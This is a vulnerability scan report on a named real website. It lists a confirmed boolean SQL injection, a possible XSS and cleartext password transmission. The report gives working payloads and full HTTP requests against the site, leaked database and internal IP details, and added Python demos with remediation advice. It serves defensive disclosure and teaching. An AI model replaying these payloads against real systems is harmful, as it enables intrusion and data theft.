SQL Injection, CWE-89, CAPEC-66, MySQL 5.0.90-community, answerology.delish.com

MySQL Version = 5.0.90-community, @@datadir = dbdata1/mdmysql2a/, User = ap_ans@mdansweb.ops.hearstdigital.com, Database = answerology


Netsparker - Scan Report Summary

TARGET URL: http://answerology.delish.com//index.aspx?tem...
SCAN DATE: 9/17/2011 1:35:31 PM
REPORT DATE: 10/3/2011 8:02:25 PM
SCAN DURATION: 00:05:01

RESULTS: 12 identified, 5 confirmed, 1 critical, 4 informational

SCAN SETTINGS

PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
AUTHENTICATION: (blank in the report)
SCHEDULED: (blank in the report)

VULNERABILITIES

Severity breakdown of the 12 findings: CRITICAL 8 %, IMPORTANT 8 %, MEDIUM 17 %, LOW 33 %, INFORMATION 33 % (1, 1, 2, 4 and 4 findings respectively)

VULNERABILITY SUMMARY

URL                    Parameter      Method  Vulnerability                            Confirmed
//index.aspx           au             GET     Boolean Based SQL Injection              Yes
//index.aspx           question_id    GET     [Possible] Cross-site Scripting          No
//index.aspx           -              -       ASP.NET Version Disclosure               No
//index.aspx           -              -       MySQL Database Identified                Yes
//index.aspx           -              -       IIS Version Disclosure                   No
/fckeditor/            -              -       Forbidden Resource                       Yes
/index.aspx            nextTemplate   GET     [Possible] Cross-site Scripting          No
/index.aspx            template       GET     [Possible] Internal IP Address Leakage   No
/index.aspx            template       GET     E-mail Address Disclosure                No
/index.aspx.cs         -              -       [Possible] Backup File Found             No
/index.aspx/answers/   -              -       Password Transmitted Over HTTP           Yes
/index.aspx/answers/   -              -       Auto Complete Enabled                    Yes
Boolean Based SQL Injection

1 TOTAL - CRITICAL - 1 CONFIRMED
SQL Injection occurs when data input, for example by a user, is interpreted by the backend database as part of a SQL command rather than as plain data. This is an extremely common vulnerability and its successful exploitation can have critical consequences. Netsparker confirmed the vulnerability by executing a test SQL query on the back-end database. In these tests the injection produced no error message or visible SQL output, but the page responded differently depending on whether the injected condition was true or false; that difference is what allowed Netsparker to identify and confirm the (blind, boolean-based) SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following attacks:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This centralises database access so the fix is applied in one place. You can also use an ORM (object relational mapping); most ORMs issue only parameterised queries, which removes the SQL Injection problem for the code that goes through them.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use the new libraries.)
  4. Use your web logs and application logs to check for earlier, undetected attacks against this resource (here, the au parameter of //index.aspx).

Remedy

The best way to protect your code against SQL Injection is to use parameterised queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not build SQL queries dynamically or by string concatenation. Note that parameters can only bind values: table and column names, or an ORDER BY direction, cannot be parameterised and must instead be checked against an allow-list of known-good identifiers.
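The following Python script is an added illustration and is not code from the Netsparker report or from the answerology application. It models the boolean-based injection in the au parameter against an in-memory SQLite table with constructed data (the real MySQL schema is unknown, and SQLite stands in for MySQL 5.0.90), shows the two-payload comparison a scanner uses to confirm such an injection without any error or data being echoed, and contrasts the concatenated query with the parameterised one the remedy calls for. Table, column and widget names are invented for the demo.

```python
import sqlite3

# Constructed stand-in for the real `answerology` MySQL database: the schema,
# table and row are invented for this demo; SQLite replaces MySQL.
_conn = sqlite3.connect(":memory:", check_same_thread=False)
_conn.execute("CREATE TABLE widgets (au TEXT, question TEXT)")
_conn.execute("INSERT INTO widgets VALUES ('delishmodules', 'Half Your Age Plus 7')")
_conn.commit()


def widget_vulnerable(au: str) -> str:
    """Query built by string concatenation: whatever is in `au` is parsed as SQL.
    Returns the question text, or '' when no row matches."""
    sql = "SELECT question FROM widgets WHERE au = '" + au + "'"
    row = _conn.execute(sql).fetchone()
    return row[0] if row else ""


def widget_fixed(au: str) -> str:
    """Same lookup with a bound parameter: `au` can only ever be compared as data."""
    row = _conn.execute("SELECT question FROM widgets WHERE au = ?", (au,)).fetchone()
    return row[0] if row else ""


def boolean_sqli_detected(lookup, base_value: str) -> bool:
    """Scanner logic for a blind, boolean-based check.

    Two payloads are appended to an otherwise harmless value: one makes the
    injected condition always true (the ' OR 'ns'='ns form the report shows),
    the other always false. If the input reaches the SQL parser the two
    responses differ; if it is bound as data they are identical, because both
    are simply unknown `au` values that match no row.
    """
    true_resp = lookup(base_value + "' OR 'ns'='ns")
    false_resp = lookup(base_value + "' AND 'ns'='nx")
    return true_resp != false_resp


def report(lookup) -> dict:
    """Summary of one lookup function's behaviour under a normal value,
    the report's payload, and the two-payload boolean check."""
    return {
        "normal": lookup("delishmodules"),
        "with_payload": lookup("nobody' OR 'ns'='ns"),
        "boolean_sqli": boolean_sqli_detected(lookup, "nobody"),
    }


if __name__ == "__main__":
    print("vulnerable:", report(widget_vulnerable))
    print("fixed:     ", report(widget_fixed))
```

In the report only the true-condition request is reproduced (the HTTP 200 with the full widget body below); the false-condition response that differed from it is what turned the finding from "identified" into "confirmed". The same comparison against the parameterised version yields two identical empty results, which is the check to run after the fix.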

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
Affected URL: //index.aspx (CONFIRMED)

http://answerology.delish.com//index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=de..

Parameters

Parameter         Type  Value
template          GET   cobrand_question_of_day_widget.ascx
widgetName        GET   delish_rightrail
au                GET   ' OR 'ns'='ns
__as_javascript   GET   true

Request

GET //index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=delish_rightrail&au='+OR+'ns'%3d'ns&__as_javascript=true HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:34:49 GMT
Content-Length: 738
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


document.write("\n");document.write("\n");document.write("<div style=\"height:40px;font-size:14px;line-height:18px;color:#668C1F;padding:0 0 10px 50px;background:url(http://answerology.delish.com//cobrands/delish/widgets/delish_rightrail/assets/qmark.png) no-repeat;\">\n");document.write(" Half Your Age Plus 7\n");document.write("</div>\n");document.write("<div style=\"height:100px;overflow:hidden;padding:0 0 15px;\">\n");document.write(" When it comes to asking a woman out, or thinking about her in terms of a serious relationship, how important is a woman's age to a man?<br /><br />\n");document.write("- Asked By amy16l\n");document.write("</div>\n");document.write("<div style=\"text-align:right;padding:0 10px 6px 0;overflow:hidden;zoom:1;\">\n");document.write(" <a href=\"http://answerology.delish.com//index.aspx?template=answer_question.ascx&question_id=143&type=EditedDialog&query=recent_questions&showEditedDialogs=true&click=ans_uni\" style=\"float:right;height:26px;overflow:hidden;\"><img src=\"http://answerology.delish.com//cobrands/delish/widgets/delish_rightrail/assets/btn-answer.png\" alt=\"Answer\" style=\"border:0\" onmouseover=\"this.style.margin='-26px 0 0'\" onmouseout=\"this.style.margin='0'\" /></a>\n");document.write("</div>\n");document.write("<div style=\"border-top:1px dashed #e4e4e4;text-align:right;padding:6px 10px 0 0\">\n");document.write(" <a href=\"http://answerology.delish.com//index.aspx/best_of/143_Half-Your-Age-Plus-7.html?query=recent_questions&kr=true\" style=\"color:#668C1F;text-decoration:none;font-size:13px;\" onmouseover=\"this.style.color='#253E0B'\" onmouseout=\"this.style.color='#668C1F'\">See how other people responded</a> <span style=\"color:#F1003E\">»</span>\n");document.write("</div>\n");document.write("\n");
Password Transmitted Over HTTP

1 TOTAL - IMPORTANT - 1 CONFIRMED
Netsparker identified that password data is sent over HTTP.

Impact

An attacker who can intercept network traffic (on a shared network, at a proxy, or anywhere on the path) can read the users' credentials in clear text.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS, not merely post to it: a login page delivered over HTTP can be altered in transit so that the credentials are sent elsewhere. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
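As an added example (not code from the report or the site), the following Python reproduces the check behind this finding: parse a page, find every form that contains a password field, resolve its action against the page URL, and flag any whose submission would travel over plain HTTP. The sample markup is constructed, since the report gives only the page URL and the form's action (/index.aspx), not the surrounding HTML.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _PasswordFormScanner(HTMLParser):
    """Collects the action attribute of every <form> that holds a password input."""

    def __init__(self):
        super().__init__()
        self._form = None          # state for the <form> currently open, or None
        self.password_forms = []   # action attribute of each password form seen

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False}
        elif tag == "input" and self._form is not None:
            if a.get("type", "").lower() == "password":
                self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            if self._form["has_password"]:
                self.password_forms.append(self._form["action"])
            self._form = None


def insecure_password_forms(page_url: str, page_html: str) -> list:
    """Absolute submit URLs of password forms whose credentials would travel
    over plain HTTP. An empty action submits back to the page itself, so the
    page URL's own scheme decides; a relative action inherits it via urljoin."""
    scanner = _PasswordFormScanner()
    scanner.feed(page_html)
    scanner.close()
    flagged = []
    for action in scanner.password_forms:
        target = urljoin(page_url, action) if action else page_url
        if urlsplit(target).scheme.lower() != "https":
            flagged.append(target)
    return flagged


# Constructed sample standing in for the /index.aspx/answers/ page: a login
# form with the relative action the report lists, a form that posts to an
# HTTPS endpoint (example host, not real), and a form with no password field.
SAMPLE_PAGE_URL = "http://answerology.delish.com/index.aspx/answers/"
SAMPLE_HTML = """
<form method="post" action="/index.aspx">
  <input type="text" name="username">
  <input type="password" name="password">
</form>
<form method="post" action="https://login.example.invalid/auth">
  <input type="password" name="pw">
</form>
<form method="get" action="/search"><input type="text" name="q"></form>
"""

if __name__ == "__main__":
    for url in insecure_password_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("password form submits over HTTP:", url)
```

The check only reports forms whose submit URL is not HTTPS. A form that posts to HTTPS from a page fetched over HTTP (the second sample form) passes this check but still violates the remedy above, so the page URL's own scheme should be reviewed alongside the result.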

Classification

OWASP A9 PCI v1.2-6.5.9 PCI v2.0-6.5.4 CWE-311 WASC-04
Affected URL: /index.aspx/answers/ (CONFIRMED)

http://answerology.delish.com/index.aspx/answers/

Form target action: /index.aspx

Request

GET /index.aspx/answers/ HTTP/1.1
Referer: http://answerology.delish.com/index.aspx/answers/Anniversary-gift.html?popular=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:42:12 GMT
Content-Length: 31229
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en"><head> <title>Cooking Tips - Recipe Advice and Help with Cooking</title><meta name="title" content="Cooking Tips - Recipe Advice and Help with Cooking" /><meta name="description" content="At Answerology.com, you can ask the opposite sex anything! Anonymously survey our global community of men and women. Get real answers to your most intimate relationship questions. Ask fun questions, get fun answers. Pose serious questions, get serious answers. Answerology. The modern way to explore life's age-old dilemna -- miscommunication between the sexes." /><meta name="keywords" content="adult personal ads, affairs, advice, ask a question, anonymous,answers, articles, attractive, attractive men, attractive women, breaking up, chat, change of heart, companion, commitment, dating advice, dating tips, divorce, divorced, engagements, expert advice, hooking up, hot guys, hot girls, marriage, miscommunication, online dating, parenting, picking up, question, questions, relationship, relationships, relationship advice, romance, secrets, serious relationship, sex, sexual, sex tips, weddings, what woman want, what women want" /> <!-- 172.20.65.108 9/17/2011 9:42:12 AM --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta NAME="zrobots" CONTENT="all" /> <meta NAME="revisit-after" CONTENT="5 days" /> <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.3.2.min.js"></script> <title>Recipes, Party Food, Cooking Guides, Dinner Ideas, and Grocery Coupons - Delish.com</title><meta name="description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><link rel="apple-touch-icon" href="/cm/delish/site_images/favicon/apple-touch-icon.png" /><link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/x-icon" /><!-- **** Canonical Meta-tag **** --><link rel="canonical" href="http://www.delish.com/answerology-wrapper/"/><!-- **** RSS **** --><link rel="alternate" type="application/rss+xml" href="http://www.delish.com" /><!-- **** STYLES **** --><!-- MSN Video Player CSS File --><!--<link rel="stylesheet" type="text/css" href="/cm/delish/styles/channels.css"></link>--><link rel="stylesheet" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" /><script type"text/javascript"> /* Set document.domain early for proper ad render */ try { document.domain = 'delish.com'; } catch(ex){}</script><style type="text/css"> /* IE Hover htc */ body { behavior: url('http://games.delish.com/proxy.aspx?url=http://www.delish.com/cm/delish/scripts/csshover3.htc'); }</style><link rel="stylesheet" href="/cm/delish/styles/global.css" type="text/css" /><link rel="stylesheet" href="/cm/delish/styles/header.css" type="text/css" /><!-- **** SCRIPTS **** --><!-- Static Promo: restrict access if subdomain not match category --><!-- End Static Promo --><script src="/cm/shared/scripts/jquery-1.4.2.min.js" language="javascript" type="text/javascript"></script><!-- refresh ads --><!-- quiz includes --><!-- /quiz includes --><script src="/cm/delish/scripts/jquery.tooltip.pack.js" type="text/javascript" language="javascript"></script><script language="javascript" src="/cm/shared/scripts/jqXMLUtils.js"></script><script src="/cm/shared/scripts/jquery.bgiframe.min.js" type="text/javascript"></script><!-- games_wrapper --><script language="javascript" src="/cm/delish/scripts/rf-tmpl-ext.js" type="text/javascript"></script><script language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL CONSTANTSvar articleID = "";var rf_cache_bust = Math.floor(Math.random()*100001);var site_name = "Delish";//Article Source 
Codevar source_id = "";//Set up the source link type - based on content type//var pageAdsParams = {"sub_cat_prefixes":"","article_type_prefix":null,"site_prefix":"delish","position_list":"ams_delish_1x1,ams_delish_footer,ams_delish_networktout,ams_delish_sponsored_links,ams_delish_top","ad_sub_category_prefix":null,"subdomain":"www","ams_promo":null,"url_name":null,"keywords":null,"browser_path":"/answerology-wrapper/?ignoreCache=1","section_prefix":"answerology-wrapper","ad_category_prefix":null,"cat_prefixes":""};</script><script type="text/javascript" src="/cm/shared/scripts/cookies.js"></script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script><link href="/cm/delish/styles/autocomplete.css" rel="stylesheet" type="text/css"><script src="/cm/delish/scripts/autocomplete_bgiframe_delish.js" type="text/javascript"></script><!--<gTMPL_INCLUDE NAME="xs_script_include_user_session.tmpl">--><!-- TEST script includes xs_script_include_user_session.tmpl DIRECT INSERT--><script>var _ghearst_vars = {};//_ghearst_vars["ams_ads_script_src"] = "";</script><script src="/cm/shared/scripts/get_mag_user_local_v02.js" type="text/javascript" ></script><script>if ($h.session.ha){ $h.util.buildScriptTag("&ha=1"); } else { }</script><!-- Omniture global variable --><script language="javascript">var s_prop49 = '';</script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/login.js"></script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/global.js"></script><!-- search and global js go here --><!-- MSN Video Player Scripts --><script src='/cm/delish/scripts/jquery.simplemodal.js' type='text/javascript'></script><!-- Confirm JS and CSS files for Logout--><script src='/cm/delish/scripts/confirm.js' type='text/javascript'></script><link type='text/css' href='/cm/delish/styles/confirm.css' rel='stylesheet' media='screen' /><!--[if lt IE 7]><link type='text/css' href='/cm/delish/styles/basic_ie.css' 
rel='stylesheet' media='screen' /><![endif]--><script language="javascript" type="text/javascript" src="/cm/shared/ria/swfobject2.1/swfobject.min.js"></script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/flash.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL FUNCTIONS/*@cc_on @*//*@if (@_jscript_version < 5.7)$(document).ready(function(){ $('#global_footer').css('display','none'); $('#global_footer').css('display','block');});/*@end @*/</script><script language="javascript">function refreshAds(){ //Hearst tracking if (top.s) { pageviewTracking(); } //MSN tracking if (top.s_msn) { if ( s_msn.referrer == location.href ) { s_msn.referrer=''; } s_msn.t(); } try { wlAnalytics.TrackPage(); } catch (e) { $.track.trackInfo.userStatic.requestId = null; $.track.trackPage(); } var spans = document.getElementsByTagName('span'); var adDivs = new Array(); for(var i=0;i<spans.length;i++){ if(spans[i].id.indexOf('ams_del') > -1 && spans[i].firstChild){ if(spans[i].firstChild.nodeName == 'DIV'){ adDivs.push(spans[i].firstChild); } } } for(var i=0;i<adDivs.length;i++){ dapMgr.displayAd(dapMgr.getAdItemIndex(adDivs[i].id)); }}</script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/omniture-tags.js"></script><!-- SHARE THIS SCRIPT DONT REMOVE --><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script><!-- //END FO SHARE THIS SCRIPT --><!-- Social --><!--xs_social_metatag_includes.tmpl--><meta property="og:description" content="For home cooks hungry for easy 
family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><!--/xs_social_metatag_includes.tmpl--><!-- /Social --><!-- Handle print function --><script language="javascript" type="text/javascript">$(document).ready(function(){ // Action for Print button Viral Tools $(".printButton a").click(function() { window.open("/print-this/" + this.id + "?page=all","Print","width=1000,height=800,menubar=no,toolbar=no,scrollbars=yes"); });});</script><!-- Handle print function --></head> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/x-icon" /> <link rel="stylesheet" href="/cobrands/delish/cobrand_styles.css?v=536265605"> <!--[if lte IE 7]><script src="/cssjs/ie-css3.js"></script><![endif]--> <script type="text/javascript" src="/cssjs/jquery.form.js"></script> <script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script> <script type="text/javascript" src="/fckeditor/fckeditor.js"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=536265605"></script> <script language="JavaScript" 
type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/CosmogirlLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/quickandsimple/QuickAndSimpleLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/delish/DelishLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/realbeauty/RealBeautyLayout.js?v=536265605"></script> <script type="text/javascript" src="/cssjs/headers.js?v=536265605"></script> <script language="JavaScript"> var args = getArgs(location.search.substring(1)); var factory = new LayoutFactory( false, ["purchase_gc.ascx"], ["registration.ascx"], args["template"] ); var cookiesToSet = []; var referrerGetter = new UserReferrerGetter(readCookie("referrer"), args["setReferrer"], cookiesToSet, document.referrer, document.location.href, ["testing.answerology.com", "answerology.com", "www.answerology.com", "hearst.answerology.com"], "", ""); var layout = factory.getLayout( 'delish' ); for (i=0; i<cookiesToSet.length; i++) { createCookie("referrer",cookiesToSet[i] , 1000, ' .delish.com' ); } </script> <script language="JavaScript"> var Answerology = { isLoggedIn: false, template: 'home.ascx', facebook: { appId: '112965278727107' } } </script> <!-- AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript"> <!-- var rsi_segs = []; var segs_beg=document.cookie.indexOf('rsi_segs='); if (segs_beg>=0){ 
segs_beg=document.cookie.indexOf('=',segs_beg)+1; if(segs_beg>0){ var segs_end=document.cookie.indexOf(';',segs_beg); if(segs_end==-1) segs_end=document.cookie.length; rsi_segs=document.cookie.substring(segs_beg,segs_end) .split('|'); } } var segLen=20; var segQS=""; if (rsi_segs.length<segLen){segLen=rsi_segs.length} for (var i=0;i<segLen;i++){ segQS+=("rsi"+"="+rsi_segs[i]+";") } //--> </script> <!-- END AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript" src="/cssjs/channels.js?v=536265605"></script> <script> //coaches_eyebrow bb_cgt="AOL Living Sites"; bb_cg=[{n:'N',t:'Beauty and Style',u:'http://living.aol.com/aolliving/beauty_style',v:'22',e:''}, {n:'N',t:'Coaches',u:'http://coaches.aol.com/',v:'22',e:''}, {n:'N',t:'Diet and Fitness',u:'http://diets.aol.com/',v:'22',e:''}, {n:'N',t:'Food',u:'http://food.aol.com/food/channel',v:'22',e:''}, {n:'N',t:'Health',u:'http://health.aol.com/',v:'22',e:''}, {n:'N',t:'Home',u:'http://homechannel.aol.com/',v:'22',e:''}, {n:'N',t:'Horoscopes',u:'http://horoscopes.aol.com/',v:'22',e:''}, {n:'N',t:'Parenting',u:'http://parenting.aol.com/parenting/onlyonaol',v:'22',e:''}]; </script> <script> document.write( layout.getCSS() ); </script> <script> document.write( layout.getStyle() ); </script> <!-- script type="text/javascript"> if (document.location != top.location) { top.location = document.location; } </script --> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --> <script type="text/javascript"> <!-- function FCx(x){ var min=15; // minimum minutes between interstitials (needs to be >15) if(x.indexOf('get.media')>0){ x=unescape(x.substring(x.indexOf('&url=')+5,x.length)); }else{ if(document.cookie.indexOf('CxIC=1')<=0){ x='http://media.fastclick.net/w/get.media?sid=16779&m=5&tp=6&url='+escape(x); var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+min*1000*60); document.cookie='FCxIC=1; path=/; expires='+date_ob.toGMTString(); } } return x } // --> </script> <!-- FASTCLICK.COM INTERSTITIAL 
HEAD CODE v1.0 for answerology.com --></head><body><div id="fb-root"></div><div id="wrapper"><script> layout.getHeaderBoxAd('homepage');</script><script> layout.getHeaderBox(referrerGetter.execute());</script>

<div id="container"> <!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES --> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script> <link rel="stylesheet" href="/cm/delish/styles/msn_header.css" type="text/css" /> <!--[if IE]> <link rel="stylesheet" href="/cm/delish/styles/msn_header_ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script> <!-- END MSN UX STYLE & SCRIPT INCLUDES --><div id="msn_header"> <div id=&..
[Possible] Cross-site Scripting

2 TOTAL - MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute script (JavaScript, VBScript) in the context of the application, inside a victim's browser. This opens several attack opportunities, most commonly hijacking the user's current session or rewriting the page's HTML on the fly to capture the user's credentials. It happens because input supplied by a user is emitted into the page and interpreted by the browser as HTML, JavaScript or VBScript.

Netsparker believes that there is an XSS (Cross-site Scripting) issue here but could not confirm it. We strongly recommend investigating the issue manually to establish whether it is a genuine XSS and needs to be addressed.

XSS targets the users of the application rather than the server. That limits its direct impact, but because it lets an attacker hijack other users' sessions, an attack aimed at an administrator can yield full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all output from the application should be encoded for the context in which it is placed (HTML body, HTML attribute, JavaScript string, URL); input validation is a useful secondary control but does not replace output encoding.

There are a number of well-structured, white-list based encoding libraries available for many environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.
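The following Python is an added example, not code from the report or the site. It shows output encoding chosen per context, using the probe the scanner placed in question_id as input: html.escape for an attribute value, and a hand-written encoder (the standard library has no JavaScript-string escaper, so this is not a named library's API) for a value embedded in a script block like the document.write output this site emits. The templates are constructed for the demo.

```python
import html
import json

# The probe the scanner placed in question_id (see the parameter table below).
PAYLOAD = "2644'\"--></style></script><script>alert(0x0001C7)</script>"


def render_vulnerable(question_id: str) -> str:
    """Template that echoes the value raw into an attribute and a script block."""
    return (
        '<input type="hidden" name="question_id" value="' + question_id + '">'
        '<script>var qid = "' + question_id + '";</script>'
    )


def encode_for_html(value: str) -> str:
    """For HTML text nodes and double-quoted attribute values."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """For a value embedded in a JavaScript string literal.

    json.dumps supplies the quotes and backslash escapes; < > and / are
    additionally escaped so the HTML parser can never see </script>, or the
    start of a new tag, inside the literal. Every escape used is valid JSON,
    so the value can be decoded back unchanged."""
    encoded = json.dumps(value)
    return encoded.replace("<", "\\u003c").replace(">", "\\u003e").replace("/", "\\/")


def render_fixed(question_id: str) -> str:
    """Same markup with each insertion encoded for the context it lands in."""
    return (
        '<input type="hidden" name="question_id" value="' + encode_for_html(question_id) + '">'
        "<script>var qid = " + encode_for_js_string(question_id) + ";</script>"
    )


def injected_markup(rendered: str) -> bool:
    """True if the user value produced tags of its own: the closing </style>
    or the <script>alert(...) from the probe appear as real markup."""
    return "</style>" in rendered or "<script>alert(" in rendered


def html_roundtrip_ok(value: str) -> bool:
    """Encoding must not lose information: decoding gives the original back."""
    return html.unescape(encode_for_html(value)) == value


def js_roundtrip_ok(value: str) -> bool:
    """Same property for the JS-string encoder, checked with the JSON decoder."""
    return json.loads(encode_for_js_string(value)) == value


if __name__ == "__main__":
    print("raw     :", render_vulnerable(PAYLOAD))
    print("encoded :", render_fixed(PAYLOAD))
    print("payload breaks out of raw template:", injected_markup(render_vulnerable(PAYLOAD)))
    print("payload breaks out of fixed template:", injected_markup(render_fixed(PAYLOAD)))
```

The attribute and the script block need different encoders: HTML entities are meaningless inside a script element, and JavaScript backslash escapes are meaningless in an attribute, so one encoder applied everywhere leaves one of the two contexts open.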

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
Affected URL: //index.aspx

http://answerology.delish.com//index.aspx?template=answer_question.ascx&question_id=2644%00%27%22--%..

Parameters

Parameter          Type  Value
template           GET   answer_question.ascx
question_id        GET   2644'"--></style></script><script>alert(0x0001C7)</script>
type               GET   EditedDialog
